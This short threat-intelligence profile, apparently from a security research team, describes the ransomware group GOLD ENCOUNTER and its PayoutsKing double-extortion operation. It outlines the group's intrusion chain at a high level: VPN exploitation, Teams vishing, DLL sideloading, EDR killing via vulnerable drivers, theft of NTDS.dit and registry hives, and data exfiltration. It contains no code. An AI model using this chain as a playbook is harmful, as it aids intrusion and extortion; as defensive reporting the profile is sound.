GOLD ENCOUNTER

GOLD ENCOUNTER is a cybercriminal threat group that operators the PayoutsKing double extortion operation, stealing data and encrypting files before demanding a ransom payment from victims. According to the PayoutsKing leak site, on which the group started to name victims in July 2025, the scheme is not operated as a ransomware-as-a-service (RaaS), meaning that it does not use affiliates to deploy ransomware. After an initial spike of naming 22 victims in July, GOLD ENCOUNTER has continued to list victim names at a rate of around five a month.
CTU researchers have observed multiple incidents involving PayoutsKing operators. Initial access has been gained by targeting Cisco or SonicWall SSL VPN devices, exploiting a SolarWinds Web Help Desk vulnerability, or email bombing leading to Microsoft Teams vishing. The QuickAssist and SuperOps remote monitoring and management (RMM) tools have then been deployed for remote access to victim environments. The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH. CTU researchers have also seen evidence of possible WebDAV abuse for accessing remote resources and the execution of a QEMU instance to run a virtual hard disk image containing attacker tooling. For credential harvesting, the group copies NTDS.dit and the SAM and SYSTEM hives to temporary directories via SMB using the 'print' command. The group also attempts to kill antivirus (AV) and endpoint detection and response (EDR) solutions using a bring your own vulnerable driver (BYOVD) technique. Before deploying ransomware, GOLD ENCOUNTER exfiltrates data to a remote SFTP location using WinSCP and Rclone.